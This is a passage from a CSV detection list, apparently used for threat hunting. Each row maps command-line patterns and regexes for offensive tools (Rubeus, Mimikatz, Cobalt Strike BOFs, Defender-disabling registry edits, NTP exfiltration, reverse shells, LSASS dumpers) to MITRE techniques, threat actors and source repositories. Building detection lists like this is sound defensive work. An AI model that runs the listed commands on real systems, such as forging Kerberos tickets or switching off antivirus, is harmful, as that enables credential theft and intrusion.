COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","105" "* /ticket:* /service:* /targetdomain:* /targetdc:*",".{0,1000}\s\/ticket\:.{0,1000}\s\/service\:.{0,1000}\s\/targetdomain\:.{0,1000}\s\/targetdc\:.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","106" "* /ticket:*.kirbi*",".{0,1000}\s\/ticket\:.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","107" "* /tn LimeRAT-Admin *",".{0,1000}\s\/tn\sLimeRAT\-Admin\s.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#scheduledtask","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","108" "* /user:* /domain:* /aes256:* /run:powershell.exe*",".{0,1000}\s\/user\:.{0,1000}\s\/domain\:.{0,1000}\s\/aes256\:.{0,1000}\s\/run\:powershell\.exe.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz Overpass-the-hash a more opsec-safe version that uses the AES256 key (similar to with Rubeus above) - works for multiple Mimikatz commands","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","N/A","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","109" "* /user:* /domain:* /ntlm:* 
/run:powershell.exe*",".{0,1000}\s\/user\:.{0,1000}\s\/domain\:.{0,1000}\s\/ntlm\:.{0,1000}\s\/run\:powershell\.exe.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz Overpass-the-hash (more risky than Rubeus writes to LSASS memory)","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","N/A","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","110" "* /user:* /domain:* /sid:S-1-5-21-* /krbtgt:* /id:* /groups:* /startoffset:0 /endin:600 /renewmax:10080 /ptt*",".{0,1000}\s\/user\:.{0,1000}\s\/domain\:.{0,1000}\s\/sid\:S\-1\-5\-21\-.{0,1000}\s\/krbtgt\:.{0,1000}\s\/id\:.{0,1000}\s\/groups\:.{0,1000}\s\/startoffset\:0\s\/endin\:600\s\/renewmax\:10080\s\/ptt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz Golden ticket (domain admin w/ some ticket properties to avoid detection)","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","N/A","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","111" "* /user:* /password:* /enctype:* /opsec /ptt*",".{0,1000}\s\/user\:.{0,1000}\s\/password\:.{0,1000}\s\/enctype\:.{0,1000}\s\/opsec\s\/ptt.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","112" "* /usetgtdeleg *",".{0,1000}\s\/usetgtdeleg\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","113" "* /v DisableAntiSpyware /t REG_DWORD /d 1 /f*",".{0,1000}\s\/v\sDisableAntiSpyware\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#registry","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","122" "* /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f*",".{0,1000}\s\/v\sDisableBehaviorMonitoring\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#registry","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","123" "* /v DisableIOAVProtection /t REG_DWORD /d 1 /f*",".{0,1000}\s\/v\sDisableIOAVProtection\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#registry","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","124" "* /v DisableOnAccessProtection /t REG_DWORD /d 1 
/f*",".{0,1000}\s\/v\sDisableOnAccessProtection\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#registry","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","125" "* /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f*",".{0,1000}\s\/v\sDisableScanOnRealtimeEnable\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#registry","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","127" "* :Failed to make full encrypt*",".{0,1000}\s\:Failed\sto\smake\sfull\sencrypt.{0,1000}","offensive_tool_keyword","Akira","Akira ransomware Windows payload","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#content","N/A","10","4","357","52","2025-04-22T10:00:56Z","2021-07-28T21:00:52Z","129" "* [+] SUCCESS: AMSI Bypassed!*",".{0,1000}\s\[\+\]\sSUCCESS\:\sAMSI\sBypassed!.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#content","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","130" "*- {phish_sub: *",".{0,1000}\-\s\{phish_sub\:\s.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - 
COLDRIVER","Phishing","https://github.com/An0nUD4Y/Evilginx2-Phishlets","1","0","#content","N/A","10","7","670","263","2025-02-06T02:46:16Z","2020-05-13T05:58:43Z","132" "* | ./send -d *:123 -tM 0 -tm 0*",".{0,1000}\s\|\s\.\/send\s\-d\s.{0,1000}\:123\s\-tM\s0\s\-tm\s0.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","Black Basta","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","#linux","N/A","10","2","138","15","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z","133" "* | Find-AmsiSignatures*",".{0,1000}\s\|\sFind\-AmsiSignatures.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","135" "* | NTLMParse*",".{0,1000}\s\|\sNTLMParse.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. 
This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","Black Basta","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","0","N/A","N/A","10","2","179","15","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z","136" "* | Test-ContainsAmsiSignatures*",".{0,1000}\s\|\sTest\-ContainsAmsiSignatures.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","137" "* \n\n*",".{0,1000}\s\\\n\\n.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","139" "* = ""KRBRELAYUP""*",".{0,1000}\s\=\s\""KRBRELAYUP\"".{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","140" "* = 
""NeverGonnaRunAroundAndDesertYou""*",".{0,1000}\s\=\s\""NeverGonnaRunAroundAndDesertYou\"".{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/cube0x0/CVE-2021-1675","1","0","#content","N/A","10","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","141" "* = [H,O,A,X,S,H,E,L,L]*",".{0,1000}\s\=\s\[H,O,A,X,S,H,E,L,L\].{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","142" "* > \\127.0.0.1\ADMIN$\__* 2>&1",".{0,1000}\s\>\s\\\\127\.0\.0\.1\\ADMIN\$\\__.{0,1000}\s2\>\&1","offensive_tool_keyword","malware","Destructive Malware targeting organizations","T1486 - T1059","TA0008","N/A","N/A","Ransomware","https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","144" "* > \\127.0.0.1\ADMIN$\__16* 2>&1*",".{0,1000}\s\>\s\\\\127\.0\.0\.1\\ADMIN\$\\__16.{0,1000}\s2\>\&1.{0,1000}","offensive_tool_keyword","wmiexec","potential wmiexec commandline pattern","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","N/A","7","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","145" "* > \\127.0.0.1\ADMIN$\__17* 
2>&1*",".{0,1000}\s\>\s\\\\127\.0\.0\.1\\ADMIN\$\\__17.{0,1000}\s2\>\&1.{0,1000}","offensive_tool_keyword","wmiexec","potential wmiexec commandline pattern","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","N/A","7","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","146" "* --> GetWindowsAnti-VirusSoftware*",".{0,1000}\s\-\-\>\sGetWindowsAnti\-VirusSoftware.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","#content","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","147" "* --> GetWindowsKernelExploitsKB*",".{0,1000}\s\-\-\>\sGetWindowsKernelExploitsKB.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","#content","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","148" "* > Wi-Fi-PASS*",".{0,1000}\s\>\sWi\-Fi\-PASS.{0,1000}","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","149" "* 0.0.0.0:8080 --threads*",".{0,1000}\s0\.0\.0\.0\:8080\s\-\-threads.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor 
","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","N/A","10","10","1588","477","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z","151" "* 0x* - HOOK DETECTED*",".{0,1000}\s.{0,1000}\s0x.{0,1000}\s\-\sHOOK\sDETECTED.{0,1000}","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","152" "* 1$a$$.exe*",".{0,1000}\s1\$a\$\$\.exe.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","153" "* 1.2.3.4:8080*",".{0,1000}\s1\.2\.3\.4\:8080.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","154" "* 11_Credentials.py*",".{0,1000}\s11_Credentials\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","155" "* 
13_NoseyParker.py*",".{0,1000}\s13_NoseyParker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","156" "* 17_Custom_Cracklist.py*",".{0,1000}\s17_Custom_Cracklist\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","157" "* 2>&1 && certutil -encodehex -f * && for /F ""usebackq"" * reg add HKLM\*","\s.{0,1000}\s2\>\&1\s\&\&\scertutil\s\-encodehex\s\-f\s.{0,1000}\s\&\&\sfor\s\/F\s\""usebackq\""\s.{0,1000}\sreg\sadd\sHKLM\\.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#registry","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","158" "* 29ABE9Hy.log*",".{0,1000}\s29ABE9Hy\.log.{0,1000}","offensive_tool_keyword","blindsight","Red teaming tool to dump LSASS memory, bypassing basic countermeasures","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/0xdea/blindsight","1","0","N/A","N/A","10","3","225","26","2024-12-31T15:28:15Z","2024-07-18T07:35:43Z","159" "* 365-Stealer *",".{0,1000}\s365\-Stealer\s.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. 
It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","160" "* 4444 meter*",".{0,1000}\s4444\smeter","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","161" "* 4444 shell*",".{0,1000}\s4444\sshell","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY 